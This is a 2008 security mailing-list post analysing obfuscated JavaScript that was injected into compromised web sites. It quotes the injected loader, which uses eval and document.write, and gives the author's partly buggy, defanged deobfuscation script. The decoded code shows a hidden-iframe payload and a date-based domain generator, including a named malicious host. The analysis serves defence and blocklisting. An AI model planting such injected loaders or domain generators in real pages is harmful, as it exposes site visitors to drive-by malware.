[nsp-sec] ack Re: probably compromised web sites
Paul Dokas
dokas at oitsec.umn.edu
Thu Mar 20 15:14:22 EDT 2008
Jon Lewis wrote:
> I'm in kind of a hurry to get a road trip started, so I haven't bothered
> decoding this yet...but here's the javascript code that was added.
>
> $="%63b%3d%22%2528d%2573)%253bst%253dtm%2570%253d%
> 2527%2527;for%2528%2569%253d0;%2569%253cds.%25%22;cu%3d%22(p}b4g
> xq)6b}g}v}x}
> .|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%25$$4|q}s|),$*(;}rfuyq*(
> ;p}b*%22;op%3d%22%2524%253d%2522%2564w%2528%2564cs(%2563u,%2531%2534))%253b%2522
> ;%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t
<snip snip>
> d-1){sc(%27v%62%75lle%74in_%6dult%69%71u%6ft%65%3d%27,2,%37)%3bev%61%6c(u%6e%65s
> ca%70%65%28%64z%2b%63z+%6f%70%2bst)%2b%27d%77(dz%2bcz(%24+%73t)%29;%27)}%65lse%7
> b$%3d%27%27};func%74%69on %73c(c%6em%2cv,e%64){%76ar%20e%78d%3dnew
> %44%61te%28);
> e%78d%2eset%44ate%28e%78d.g%65t%44ate%28)+%65d)%3bdo%63u%6dent%2eco%6fk%69e%3dcn
> %6d%2b%20%27%3d%27
> +esc%61pe%28%76)%2b%27;ex%70ir%65s%3d%27+ex%64.t%6fGM%54St%72
> i%6eg()%3b};";eval(unescape($));document.write($);
I've torn it apart (not an easy process) and arrived at the following script. There's
still a bug in there somewhere that is causing characters to be dropped or altered,
so please be careful with this. The results may not be 100% accurate. The output of
this for today is:
<div sle="visibili:hidden"><iframe src="htp://bgidthr.com/ld/dx/" widh=100 heigh=80></iframe></div>
The errors are pretty obvious, but the URL seems right. bgidthr.com is registered.
Basically, they're building the URLs on the fly based on the date.
It's also interesting to see 'veslox.com' in there. Perhaps they're involved or
maybe it's to mislead people analyzing the script. I don't know.
In case anyone is interested, I used the following method to tear this apart:
http://www.websense.com/securitylabs/blog/blog.php?BlogID=98
Paul
-----------------------------CUT HERE-----------------------------
// ---- Stage-1 data: the obfuscated fragments, as captured from the page ----
// Two encodings are mixed. ca/cb/cc/cd/ce are percent-encoded pieces of the
// XOR decoder dcs(); cz() below joins them (ca+cb+cc+cd+ce). Note that some
// escapes are split across fragment boundaries (cb ends in '%', cc starts with
// '6cen', i.e. '%6c' = 'l'), so the pieces only decode correctly once joined.
// cu and da/db/dc/dd/de carry the XOR layer and are fed to dcs(cu,14) and
// dcs(da+db+dc+dd+de,10) further down.
// NOTE(review): the literals de, db, da, dz, dd and dc are broken across two
// lines here, apparently by mail wrapping; a JS parser rejects an unterminated
// string literal, so rejoin each onto one line before running this.
cb="%28d%73)%3bst%3dtm%70%3d%27%27;for%28%69%3d0;%69%3cds.%";
// XOR-obfuscated HTML fragment; decoded by dcs(cu,14) (see the calls below).
cu="(p}b4gxq)6b}g}v}x}.|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%$$4|q}s|),$*(;}rfuyq*(;p}b*";
// `op` is not referenced anywhere in the visible script.
op="%24%3d%22%64w%28%64cs(%63u,%31%34))%3b%22;";
de="-|)K88d)K7}7M;}^}950%22%9M+yv888d)K7t7M:%229.-%252096688d)K7t7M:%229,-)99tSx-~)K8d)K7t7M50!%209M+u|cu0tSx-|)K88d)K7t7M:&950%22'9M+4-4>bu|qsu8t<iSx%22;}Sx;iSx!;tSx;})Kd)K7}7M=!M;
7>s%7F}79+";
cc="6cen%67t%68;i%2b+){%74mp%3dds%2e%73l%69ce%28i,i%2b%31)%";
ce="2e%63har%43ode%41%74(0%29^(%270%780%30%27+es)%29%29;}}";
// Percent-encoded source of cz(); the hand-decoded function follows below.
//cz="%66un%63ti%6fn%20%63z(c%7a){r%65t%75rn%20c%61%2b%63b+%63c+c%64%2bc%65%2bc%7a;%7d;";
// Overwritten with plain text before it is used (see `st=` below).
st="%73t%3d%22$%3ds%74%3bd%63%73%28d%61%2b%64b%2b%64%63+%64%64+%64%65%2c%31%30%29;%64%77(%73t%29;%73t%3d%24%3b%22%3b";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%22<#<$<%<&<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTq
i89;%229+u|cu";
cd="3b%73t%3dst%2bSt%72i%6eg%2efr%6fmC%68ar%43od%65((%74mp%";
da="fqb0})-~ug0Qbbqi87e~%7F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7{7<7|7<7}7<7~7<7%7F7<73c7
a7<7b7<7c7<7";
// Percent-encoded source of dw(); it is prepended to the decoder in the dw()
// call below, and the hand-decoded function dw(t) appears further down.
dz="%66u%6ecti%6f%6e%20%64w(t%29{c%61%3d%27%2564o%2563u%256den%2574%2ew%2572%69%25%374e%2528%252%32%27;%63%65%3d%27%2522)%27;c%62%3d%27%253c%2573c%72%69%2570%257%34l%61%256egu%256
1%67%2565%253d%255c%2522j%61va%73cr%2569%2570%74%255c%25%32%32%253e%27;cc%3d%27%253c%255c%252fsc%2572i%257%30t%253e%27;ev%61l%28%75n%65sca%70e%28t)%29};";
ca="%66u%6ec%74%69o%6edc%73(%64s,%65%73){d%73%3dunes%63ape";
dd="}Sx<tSx<}^}+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m}^}-S]^8d)K7t7M<d)K7}7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%20hQQ9;}^}950&5##950%22&M+iSx%22-|)K8888d)K7i7M6%20h##!!9..#9;}^}
950!%209M+}Sx";
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M,%209d)K7t7M-!+d)K7}7M-t)>wud]%7F~dx89;!+ve~sdy%7F~0S]^8t<}<i9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%7Fh>s%7F}7+fqb
0iSx!<iSx%22<";
function cz(tail)
{
// Glues the percent-encoded decoder fragments (globals ca..ce from the top of
// the script) in front of `tail`. With the captured globals this yields the
// encoded source of dcs(); `tail` is the plain-text stage-2 driver code.
// Evaluated once, through the dw() call that follows.
const decoderSource = ca + cb + cc + cd + ce;
return decoderSource + tail;
}
// Stage-1 driver. `$` and `st` are short plain-text snippets appended after
// the decoder fragments; dw() then prints (originally: eval'd)
// unescape(dz + ca+cb+cc+cd+ce + $ + st). The function definitions and calls
// that follow appear to be the author's hand-decoded copy of that output.
// dw() is a function declaration further down, so the call here relies on
// hoisting; `$` and `st` are implicit globals (no var).
$="dw(dcs(cu,14));";
st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;";
dw(dz+cz($+st));
function dw(t)
{
// Decoded body of `dz`. The four percent-encoded globals decode to
// document.write(" / <script language=\"javascript\"> / <\/script> / ")
// (presumably consumed by a later stage; nothing visible here reads them).
// The original then eval()s unescape(t); that has been defanged to print()
// so each decoded stage can be inspected instead of executed.
ca = '%64o%63u%6den%74.w%72i%74e%28%22';
cb = '%3c%73cri%70%74la%6egu%61g%65%3d%5c%22javascr%69%70t%5c%22%3e';
cc = '%3c%5c%2fsc%72i%70t%3e';
ce = '%22)';
const decoded = unescape(t);
// print() is a JS shell builtin (Rhino/SpiderMonkey style), not a browser API.
print(decoded);
}
function dcs(ds,es)
{
// XOR decoder for the second obfuscation layer. `ds` is percent-decoded
// first; every character is then XORed with the key obtained by prefixing
// `es` with '0x00' and letting `^` coerce the string to a number
// (es=14 -> 0x14 = 20, es=10 -> 0x10 = 16).
// The result is left in the global `st` (the last character in the global
// `tmp`); nothing is returned, so callers read `st` afterwards.
const key = '0x00' + es;
const plain = unescape(ds);
tmp = '';
st = '';
for (i = 0; i < plain.length; i++) {
tmp = plain.charAt(i);
st += String.fromCharCode(tmp.charCodeAt(0) ^ key);
}
}
// Stage-2 driver (the text held in `$` and `st` above, now run as code).
// dcs() returns undefined and leaves its output in the global `st`, so this
// first call prints unescape(undefined) == "undefined"; the decoded HTML is
// picked up from `st` on the next line. Its first bytes decode to `<div sle=`,
// so the characters missing from the output quoted in the message appear to
// be absent from the captured `cu` data rather than lost inside dcs().
dw(dcs(cu,14));
$=st;                    // keep the decoded iframe HTML; used by the replace() at the end
dcs(da+db+dc+dd+de,10);  // XOR-decode (key 0x10) the date-based hostname generator
dw(st);                  // print it (original: eval); the code below is the decoded result
st=$;
// ---- Stage-2 decoded payload: date-driven hostname generator ----
// Lookup tables used to assemble the hostname (see the replace() at the end).
// m9: one token per month, indexed by t9['m']-1.
var m9=new Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');
// The raw decode of l9 came out garbled between 'o' and 'q' ('#s'q'); the
// hand-corrected alphabet follows on the next line.
//var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','#s'q','r','s','t','u','v','w','x','y','z');
var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
// n9: digit choices for dCh (index 0 -> 1; index 9 would be undefined).
var n9=new Array(1,2,3,4,5,6,7,8,9);
// t9 is an Array used as a string-keyed map: t9['y'], t9['m'], t9['d'].
var t9=new Array();
// Local date at run time; every generated character depends on it.
var d9=new Date();
t9['y']=d9.getFullYear();
// Day-of-month pushed back by the weekday (plus 2 from Thursday on): the
// value is the same for Sun..Wed of a week, and the same for Thu..Sat, so one
// name is in effect for several days. Negative results are clamped to 1.
if(d9.getDay()>3)
t9['d']=d9.getDate()-(d9.getDay()+2);
else
t9['d']=d9.getDate()-(d9.getDay());
if(t9['d']<0) t9['d']=1;
// getMonth() is 0-based; t9['m'] is 1..12.
t9['m']=d9.getMonth()+1;
function CMN(d,m,y) {
// Mixing function for the hostname generator: folds the adjusted day, the
// month and the year into one integer that seeds every generated character.
// `^` binds looser than `*` and `+`, so the parentheses around (m ^ d) matter.
const dayTerm = 3 * d;
const mixTerm = (m ^ d) * 3;
return y + dayTerm + mixTerm + d;
}
// 'veslox.com' is the hostname inside the decoded iframe HTML held in `$`
// (it decodes from `cu`); the replace() at the end swaps it for the generated
// name, so it acts as a placeholder rather than the live host. A blocklist
// would have to reproduce this generator for the date in question.
var d='veslox.com';
var yCh1,yCh2,mCh,dCh,mNm;
// Floor the year so the arithmetic below never sees anything before 2007.
if(t9['y']<2007) {
t9['y'] = 2007;
}
// One mixing value feeds every character below.
mNm=CMN(t9['d'],t9['m'],t9['y']);
// Three letters derived from (masked) year bits, the month and mNm.
yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)% 26];
yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)];
mCh=l9[((t9['m']+mNm)% 25)];
// Fourth character: a digit when the adjusted day is 0..4, otherwise a letter.
if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))
dCh=n9[(t9['d']% 10)];
else
dCh=l9[((t9['d']*6)% 27)];
// Hostname = yCh2 mCh yCh1 dCh + month token + '.com', substituted for the
// placeholder in the decoded iframe HTML. The raw decode used `relace` (kept
// below as a comment); the author's corrected call follows it.
//$=$.relace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');
fnord=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');
// The final injected HTML — this is the output quoted in the message above.
print(fnord);
-----------------------------CUT HERE-----------------------------
--
Paul Dokas dokas at oitsec.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."